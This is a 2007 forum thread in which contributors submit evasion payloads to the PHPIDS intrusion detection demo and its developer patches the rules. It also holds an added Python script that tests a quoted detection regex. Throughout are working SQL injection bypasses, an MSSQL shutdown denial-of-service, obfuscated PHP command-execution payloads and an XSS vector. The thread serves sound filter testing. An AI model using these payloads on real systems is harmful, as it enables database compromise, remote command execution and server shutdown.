Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 03, 2007 10:48AM

MSSQL DoS/slow down (if that's still in the scope of the project):

--> ?test=1'; anything: goto anything -- -a (php-ids)
--> ?test=1'; WAITFOR TIME '17:48:00 ' shutdown -- -a (php-ids)


Never worked with it, but in addition to tx's php injections these two would also work I think:

--> ?test=aa"; { passthru("shutdown -s"); } // (php-ids)
--> ?test=aa"; shell_exec("shutdown -s"); // (php-ids)



Edited 1 time(s). Last edit at 10/03/2007 11:03AM by Reiners.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 03, 2007 10:57AM

Hi!

I think I have them all fixed again w/o too many false positives (at least the tests tell me so *g*).

@tx: The RFE vectors are awesome again - I am still very glad that PHP demands way more strictness for its coding than other languages! ;)

@Reiners: Wow - neat. Especially the ultra short ones were very hard to come by.

Thanks a lot again - I think we'll be ready for 0.4.2 soon! Btw - I will be afk from 7th to 14th of October and lying around close to a swimming pool so forgive me if there will be no fixes during that time ;)

Greetings,
.mario

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 03, 2007 11:17AM

Hi .mario!
very nice fixes!!
only one little injection slipped through:
' =+ ' (php-ids)

greetings and relaxing vacation,
Reiners

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 03, 2007 11:23AM

Yikes - fixed, thx! ;)

I started to add first material to the VectorWiki - it's still very basic though and the admins haven't set the sub domain yet..

https://trac.php-ids.org/wiki/VectorWiki

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 03, 2007 11:26AM

I won't let you go on vacation now ;)
asd' =- (-'asd') -- -a (php-ids)
asd' |1 != (1)#aa (php-ids)



Edited 3 time(s). Last edit at 10/03/2007 12:05PM by Reiners.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 03, 2007 12:08PM

another fix to earn my holidays ;) thx!

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 03, 2007 01:03PM

watch out for spaces:
asd' =- ( - 'asd' ) -- -a (php-ids)

It's just incredible how flexible the MySQL syntax is. MSSQL is much more strict on that.
Note that I have edited the first and the third post on this page while you responded so quickly, so maybe you overlooked it.

greetings,
Reiners

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 03, 2007 09:10PM

Hi!
Again some MySQLi ... some don't make sense actually, but they all work. damn MySQL, not only javascript is weird. As you can see it's almost always the same trick: using a lot of different prefixes and brackets. But I thought the more examples given - the easier is the fixing. So it isn't actually that much as it looks ;)

' =+ - ' (php-ids)
asd' =+ ('asd') -- -a
asd' =+-('asd') -- -a (php-ids)
asd' =+ - ( + 'asd' ) -- -a (php-ids)

asd' |+(1) != '1 (php-ids)
asd' |(1) != +'1 (php-ids)

aa'+2 = '0 (php-ids)
aa' - 2 =+ -'0 (php-ids)
aa'+2-((-1)) =+ -'0 (php-ids)

0' XOR+ -'1 (php-ids)

aa' LIKE + -'0 (php-ids)
aa'LIKE+ -'0
aa'LIKE (0) -- -a
aa'LIKE +(0) -- -a
aa'LIKE + ( -0) -- -a (php-ids)

aa' REGEXP+ - '0 (php-ids)
aa' REGEXP+ -(- 0) -- -a (php-ids)

aa' SOUNDS LIKE+ -'1 (php-ids)
aa' SOUNDS LIKE+ (1) -- -a (php-ids)
(does not work if column type is int)

aa' in +(0) -- -a (php-ids)
aa' in +(-0,-1) -- -a
aa'in+ ('aa') or -1 != '0 (php-ids)

root@localhost' =+ current_user -- -a (php-ids)
(attacker needs to figure out what the default user is, so this is probably not that dangerous)

As you can see, on MySQL you can use prefixes, spaces, brackets and quotes almost everywhere and as much as you like. It is really really hard to filter all those things correctly I think.

PHPi:
"; { if (true) passthru("dir"); } // (php-ids)

greetings,
Reiners

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: October 04, 2007 10:33AM

Well I've been messing with Javascript again :)

This doesn't work (score of 5) but I thought I'd post it anyway:-
new Image().src= !null?'javascriptz:zalertz(1)'['split']('z')['join']([]):0

Tested under Opera but may also work in IE

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 04, 2007 11:27AM

*finished fixing* you mean 10 ;)

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 04, 2007 11:31AM

Hi .mario!
very nice fixes, it's getting harder and harder ;)

aa' LIKE 0 -- -a (php-ids)
aa' LIKE md5(1) or '1 (php-ids)
aa' REGEXP- md5(1) or '1 (php-ids)
aa' DIV@1 = 0 or '1 (php-ids)
aa' XOR- column != -'0 (php-ids)

The first expression often doesn't work on its own. It's correct syntax, but it doesn't return true. I just use it to place the "or" in a different place than right behind the quote (where it is impossible to get it to work undetected ;)

greetings,
Reiners

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 04, 2007 01:16PM

@.mario: The filters are getting really challenging now.

Here's some variations on a PHPi that Reiners posted yesterday:
http://demo.php-ids.org/?test=%22%3B%7B%20if%20%28true%29%20%24_a%20%20%3D%20%22%22%20.%20strtolower%28%22pass%22%29%3B%0Aif%20%20%20%281%29%20%24_a.%3D%20%22%22%20.%20strtolower%28%22thru%22%29%3B%20%0A%24_a%28%20%22dir%22%29%3B%20%7D%20//
?test=";{ if (true) $_a  = "" . strtolower("pass");
if   (1) $_a.= "" . strtolower("thru"); 
$_a( "dir"); } //
http://demo.php-ids.org/?test=%22%3B%7B%20if%20%28true%29%20%24_a%20%20%3D%20%22%22%20.%20str_replace%28%27%21%27%2C%27%27%2C%27s%21y%21s%21t%21e%21m%21%27%29%3B%0A%24_a%28%20%22dir%22%29%3B%20%7D%20//
?test=";{ if (true) $_a  = "" . str_replace('!','','s!y!s!t!e!m!');
$_a( "dir"); } //

Some new techniques in this one: http://demo.php-ids.org/?test=%22%20%3B%20//%0A%24_y%20%3D%20%22%22%20.%20strrev%28%22ftnirp%22%29%3B%0Aif%20%20%28%210%29%20%20%20%20%24_a%20%3D%20base64_decode%20%3B%0Aif%20%20%28%210%29%20%20%20%20%24_b%3D%22%22%20.%20%24_a%28%27cHdk%27%29%3B%0Aif%20%28%210%29%20%24_y%28%60%24_b%60%29%3B//
?test=" ; //
$_y = "" . strrev("ftnirp");
if  (!0)    $_a = base64_decode ;
if  (!0)    $_b="" . $_a('cHdk');
if (!0) $_y(`$_b`);//

EDIT: This one could use some explaining. Payload is a base64 encoded command in the b GET variable, the code parses the query_string and assigns the $_GET['b'] to $b which is then decoded and ran through the backtick execution operators (``) and output through an aliased printf. Also note that eval respects new lines so the comment marks don't actually comment any code. http://demo.php-ids.org/?test=%22%20%3B%20//%0Aif%20%20%28%210%29%20%24_a%20%3D%20base64_decode%20%3B%0Aif%20%20%28%210%29%20%24_b%20%3D%20parse_str%20%3B%20//%0A%24_c%20%3D%20%22%22%20.%20strrev%28%22ftnirp%22%29%3B%0Aif%20%20%28%210%29%20%20%24_d%20%3D%20QUERY_STRING%3B%20//%0A%24_e%3D%20%22%22%20.%20%24_SERVER%5B%24_d%5D%3B%0A%24_b%28%24_e%29%3B%20//%0A%24_f%20%3D%20%22%22%20.%20%24_a%28%24b%29%3B%0A%24_c%28%60%24_f%60%29%3B//&b=cHdk
?test=" ; //
if  (!0) $_a = base64_decode ;
if  (!0) $_b = parse_str ; //
$_c = "" . strrev("ftnirp");
if  (!0)  $_d = QUERY_STRING; //
$_e= "" . $_SERVER[$_d];
$_b($_e); //
$_f = "" . $_a($b);
$_c(`$_f`);//

EDIT: Shorter variation shoving all identifiable names into the request string. (Register Globals = On) http://demo.php-ids.org/?test=%22%3B%20//%0A%24_c%20%3D%20%22%22%20.%20%24_a%28%24b%29%3B%0A%24_b%28%60%24_c%60%29%3B//&b=ZGly&_a=base64_decode&_b=printf
?test="; //
$_c = "" . $_a($b);
$_b(`$_c`);//

This is how the attack would actually look:
h++p://victim.com/index.php
?injection_point=%22%3B%20//%0A%24_c%20%3D%20%22%22%20.%20%24_a%28%24b%29%3B%0A%24_b%28%60%24_c%60%29%3B//
&b=ZGly
&_a=base64_decode
&_b=printf
&submit=submit


EDIT: I just realized, I wrote one of those vectors redundantly it should be:
?test=" ; //
if  (!0) $_b = parse_str ; //
$_c = "" . strrev("ftnirp"); //
$_e= "" . $_SERVER[$_d];
$_b($_e); //
$_f = "" . $_a($b);
$_c(`$_f`);//
attack looks like:
h++p://demo.php-ids.org/?test=%22%20%3B%20//%0Aif%20%20%28%210%29%20%24_b%20%3D%20parse_str%20%3B%20//%0A%24_c%20%3D%20%22%22%20.%20strrev%28%22ftnirp%22%29%3B%20//%0A%24_e%3D%20%22%22%20.%20%24_SERVER%5B%24_d%5D%3B%0A%24_b%28%24_e%29%3B%20//%0A%24_f%20%3D%20%22%22%20.%20%24_a%28%24b%29%3B%0A%24_c%28%60%24_f%60%29%3B//
&b=cHdk
&_a = base64_decode
&_d=QUERY_STRING

It still gets caught (Score: 7) but I felt I should at least clarify.

-tx @ lowtech-labs.org



Edited 15 time(s). Last edit at 10/08/2007 11:41PM by tx.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 04, 2007 08:52PM

blah, blah, blah another variation. I was thinking about sirdarckcat and eval'ing document.location. pretty much the concept that there is certain data that isn't likely to be checked (either due to possibility or context), ie. in the case of javascript the post hash characters, and in this case, certain variables. This is related to the Register Globals=On vector, which has damn near infinite possibilities, but seems extremely difficult to filter against. (I mean
?test=" ; $_a( `$_b` );//
could potentially root or completely DoS a server (and gets through the filter of course) but really, how common is that vulnerability? But then again, if you've got code that's eval'ing a string that contains user input and your server has Register Globals set to 'on', you're pretty much asking to get pwnd. *shrug*
Anyway, enough talk: http://demo.php-ids.org/?test=%22%20%3B%20//%0Aif%20%28%210%29%20%24_a%20%3D%20%22%22%20.%20str_rot13%28%27cevags%27%29%3B%20//%0A%24_b%20%3D%20HTTP_USER_AGENT%3B%20//%0A%24_c%3D%20%22%22%20.%20%24_SERVER%5B%24_b%5D%3B%20//%0A%24_a%28%20%60%24_c%60%20%29%3B//
Vector works with register globals off and executes whatever the user has put in their user-agent, on the command line.
?test=" ; //
if (!0) $_a = "" . str_rot13('cevags'); //
$_b = HTTP_USER_AGENT; //
$_c= "" . $_SERVER[$_b]; //
$_a( `$_c` );//

I think perhaps these php vectors are getting a bit too esoteric. @.mario: just say the word and I'll go back to something more sensible. :)
sure is fun though!

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 10/04/2007 09:13PM by tx.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 05, 2007 05:52AM

@tx: Nice ones indeed! Nope - there's nothing esoteric enough as long as it works - but I guess the next code execution vectors should be a little bit more complicated to inject ;) Thanks again!

@Reiners: Thx - I will take care of those ASAP! *fixed*

Greetings,
.mario



Edited 1 time(s). Last edit at 10/05/2007 11:00AM by .mario.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 05, 2007 07:40PM

@.mario: Great fixes again, you're making this nice and fun. I can only tip my hat to your regex prowess... it's a lot easier for me to get around these rules than it would be for me to write them! *tips hat*

Anyway, the
(?:<[?%](?:php)?.*(?:[?%]>)?)|(?:;\s*\$\w+\s*=)|(?:\$\w+\s*=(?:(?:\s*\$?\w+\s*[(;])|\s*".*"))
rule can be circumvented by prepending a null value to the string/constant/function name thats being assigned to a variable: http://demo.php-ids.org/?test=%22%3B%7B%20if%20%28true%29%20%24_a%20%20%3D%20%24_n%20.%20str_replace%28%27%21%27%2C%27%27%2C%27s%21y%21s%21t%21e%21m%21%27%29%3B%20//%0A%24_a%28%20%22dir%22%29%3B%20%7D%20//
?test=";{ if (true) $_a  = $_n . str_replace('!','','s!y!s!t!e!m!'); //
$_a( "dir"); } //
Where $_n is anything that evaluates to null or false. (ie !1 , any uninitialized variable, equations, etc., but not anything that === 0), here are a few examples/test cases:
?test=";{ if (true) $_a  = !1 . str_replace('!','','s!y!s!t!e!m!'); //
$_a( "dir"); } //
?test=";{ if (true) $_a  = @(1/0) . str_replace('!','','s!y!s!t!e!m!'); //
$_a( "dir"); } //

I think catching anything matching the pattern:
{",'}; {any characters} ${alphanums,_} = {any characters} . {any characters};
would effectively kill that vector (and a lot of potential variations).

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 10/05/2007 10:03PM by tx.
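
The rule quoted in tx's post above and the pattern suggested there, run over the vectors from that post. This is an added example, not part of the thread and not PHPIDS code. The regex reading of the suggested pattern, the default regex flags, and the two benign strings are assumptions; PHPIDS's input conversion and its other rules are not reproduced.

```python
import re

# Rule as quoted in the post, compiled with default flags (an assumption:
# PHPIDS's own modifiers and input conversion are not reproduced here).
QUOTED_RULE = re.compile(
    r'(?:<[?%](?:php)?.*(?:[?%]>)?)|(?:;\s*\$\w+\s*=)'
    r'|(?:\$\w+\s*=(?:(?:\s*\$?\w+\s*[(;])|\s*".*"))'
)

# One possible regex reading (an assumption) of the suggested pattern:
#   {",'}; {any characters} ${alphanums,_} = {any characters} . {any characters};
SUGGESTED = re.compile(r'''["'];.*\$\w+\s*=.*\..*;''', re.DOTALL)

# Pieces shared by the vectors; values of the "test" parameter as posted.
HEAD = '";{ if (true) $_a  = '
CALL = " . str_replace('!','','s!y!s!t!e!m!');"
TAIL = '\n$_a( "dir"); } //'

VECTORS = {
    'empty string ""': HEAD + '""' + CALL + TAIL,          # earlier form
    "$_n (unset variable)": HEAD + "$_n" + CALL + " //" + TAIL,
    "!1": HEAD + "!1" + CALL + " //" + TAIL,
    "@(1/0)": HEAD + "@(1/0)" + CALL + " //" + TAIL,
}

# Constructed benign inputs, used as a small false-positive check.
BENIGN = [
    'She wrote "ok"; the total was $5.',
    "name=O'Brien; qty=3.5;",
]


def scan(value):
    """Return which of the two patterns flag the given parameter value."""
    return {
        "quoted_rule": bool(QUOTED_RULE.search(value)),
        "suggested": bool(SUGGESTED.search(value)),
    }


def report():
    """Scan every vector from the post and return the hits per label."""
    return {label: scan(value) for label, value in VECTORS.items()}


if __name__ == "__main__":
    for label, hits in report().items():
        print(f"{label:22} {hits}")
    for text in BENIGN:
        print(f"benign {text!r}: {scan(text)}")
```

The quoted rule only fires when the assignment is followed directly by a quoted string or by an identifier and `(` or `;`, which is why any prefix it does not anticipate (`$_n`, `!1`, `@(1/0)`) slips past it while the broader assignment-plus-concatenation pattern still matches.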

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 06, 2007 08:22AM

Hi!

Thanks, tx. I added a new pattern for that kind of injection - pretty much like the one you suggested.

Greetings,
.mario

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 06, 2007 01:25PM

@.mario: That's catching just about everything now. Just one more:
http://demo.php-ids.org/?test=%22%3B//%0A%7B%20if%20%28%21%22%7D%22%29%7B%0A%3B%0A%7Delse%7B%20%24_a%20%20%3D%20%21%22%29%22%20.%20str_replace%28%22%21%22%2C%22%22%2C%22s%21y%21s%21t%21e%21m%21%22%29%3B%20//%0A%24_a%28%20%22dir%22%29%3B%20%7D%7D%20//
?test=";//
{ if (!"}"){
;
}else{ $_a  = !")" . str_replace("!","","s!y!s!t!e!m!"); //
$_a( "dir"); }} //

Have a good vacation! :)

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 10/06/2007 01:25PM by tx.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 07, 2007 03:11AM

aa'LIKE(0) -- -a (php-ids)
aa'regexp(0) -- -a (php-ids)
consider that you can use prefixes and spaces in the brackets as well as in front of the brackets, since these are not functions.

greetings,
Reiners

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 07, 2007 07:21AM

Hi!

Thanks guys - see you back in a week...

Greetings,
.mario

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 15, 2007 11:11AM

Hi!

I survived the vacation and even managed to fix the latest injections ;) Furthermore I added support for the ENTITY/ELEMENT xml injection patterns and some dangerous hex entities when coming to sql injections.

We will change the paths in the config from relative to absolute the next days (this will take some time because we have to rewrite the whole test suite) - after that we will release 0.4.2.

@Reiners: I would like to feature an article/interview with you on php-ids.org about sql injection and webappsec in general. Please drop me a line if you are interested.

Greetings!
.mario

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 16, 2007 02:13AM

Hi .mario!
welcome back ;) I'm really looking forward to the interview, although I feel a bit awkward to speak beside all the other experts since I'm somewhat new to webappsec. I will give my best ;)

aa' like(0) -- -a (php-ids)
aa' regexp (0) -- -a (php-ids)
(space behind the quote)

greetings,
Reiners

----------------
edit:

'/1=' (php-ids)
aa'/1='0
aa'/1 like '0
aa'/1 or+1=+'1
aa'/0 is null-- -a

aa'%1='0 (php-ids)
aa'%1 or+1=+'1

aa'<3 or+1=+'1 (php-ids)
aa'<=3 or+1=+'1
aa'<<3 or+1=+'1

aa'^0='0 (php-ids)
aa'^3 or+1=+'1

aa'&1='aa (php-ids)
aa'&1 or+1=+'1

The trick is to place some unfiltered math operations before the real injection. Besides the "or" you can also use "like" and "regexp" of course.

edit²:
aa' like +0 -- (php-ids)



Edited 3 time(s). Last edit at 10/18/2007 09:57AM by Reiners.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 22, 2007 07:30AM

adding more math to circumvent new filters:

(php-ids) aa'/1 DIV 1 or+1=+'1
(php-ids) aa'&0+1='aa
(php-ids) aa' like(0) + 1-- -a
(php-ids) aa'^0+0='0
(php-ids) aa'^0+0+1-1=(0)-- -a
(php-ids) aa'<3+1 or+1=+'1
(php-ids) aa'%1+0='0
(php-ids) '/1/1='

as always, there are quite some modifications possible by using different operands, prefixes, spaces, quotes and (brackets).

$operand = array("^", "=", "!=", "%", "/", "&", "&&", "|", "||", "<", "<<", ">", ">>", ">=", "<=", "<>", " XOR ", " DIV ");
$prefix = array("+", "-", "~", "!", "@", " ");

greetings,
Reiners

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 23, 2007 04:01AM

Hi Reiners!

Thx again - they all should be fixed by now. Tomorrow we will release 0.4.2 and after that I will get back to you for the interview.

Greetings,
.mario

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 23, 2007 09:42AM

Hi .mario!
I'm looking forward to that =)
As mentioned in my last post there are a lot of modifications possible. some examples:

(php-ids) aa'/1 or '1 (different payload)
(php-ids) aa'/1 regexp '0 (different payload)
(php-ids) ' / 1 / 1 =' (spaces)
(php-ids) '/1=' (unfixed ;)
(php-ids) aa'&0+1 = 'aa (spaces)
(php-ids) aa'&+1='aa (prefix)
(php-ids) aa'&(1)='aa (or bracket)
(php-ids) aa'^0+0 = '0 (spaces)
(php-ids) aa'^0+0+1-1 = (0)-- -a (spaces)
(php-ids) aa'^+-3 or'1 (prefixes)
(php-ids) aa'^0!='1 (different operand)
(php-ids) aa'^(0)='0 (brackets)
(php-ids) aa' < (3) or '1 (brackets)
(php-ids) aa' <<3 or'1 (different payload)
(php-ids) aa'-+!1 or '1 (prefixes)
(php-ids) aa'-!1 like'0 (prefixes)
(php-ids) aa' % 1 or '1 (spaces)

greetings,
Reiners



Edited 1 time(s). Last edit at 10/23/2007 09:53AM by Reiners.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 24, 2007 02:52AM

Hi!

They should all be fixed right now - the tests tell me so ;) Thanks again - some of them were really hard to come by!

Greetings,
.mario

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 24, 2007 09:01AM

Hi .mario!
new stuff for you ;)
most common trick is still using spaces:

(php-ids) aa' / '1' < '3
(php-ids) aa' / +1 < '3
(php-ids) aa' - + ! 2 != + - '1
(php-ids) aa' - + ! 1 or '1
(php-ids) aa' / +1 like '0
(php-ids) ' / + (1) / + (1) ='
(php-ids) aa' & +(0)-(1)='aa
(php-ids) aa' ^+ -(0) + -(0) = '0
(php-ids) aa' ^ + - 3 or '1
(php-ids) aa' ^ +0!='1
(php-ids) aa' < +3 or '1
(php-ids) aa' % +1 or '1

but as I said, there are so many different modifications possible it's hard to get them all ;)

greetings,
Reiners

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 24, 2007 10:19AM

Hi!

Those were hard ones again but I think they taught me to write a rule that catches all of the latest submissions... let's see *fixed*

;)

Greetings,
.mario

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 24, 2007 12:10PM

damn, tough rule, very nice !! Could not modify one of the above attacks successfully.
I just noted a missing prefix before "like" in the rule:

(php-ids) aa'like!'1

Very nice fixes.
greetings,
Reiners

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 24, 2007 01:57PM

another two:

(php-ids) '< ~' (yes, it works on mysql ;)
(php-ids) 1' < ascii('1') #aaa
0' !=+ ascii('1') #aaa
0' = + ! ascii('1') #aaa

greetings,
Reiners

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 24, 2007 03:13PM

.mario,
This is still undetected:
http://demo.php-ids.org/?test=%27%20or%20MATCH%20%28username%29%20AGAINST%20%28%27+admin%20-asds%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a
?test=' or MATCH (username) AGAINST ('+admin -asds' IN BOOLEAN MODE); -- -a

-tx @ lowtech-labs.org
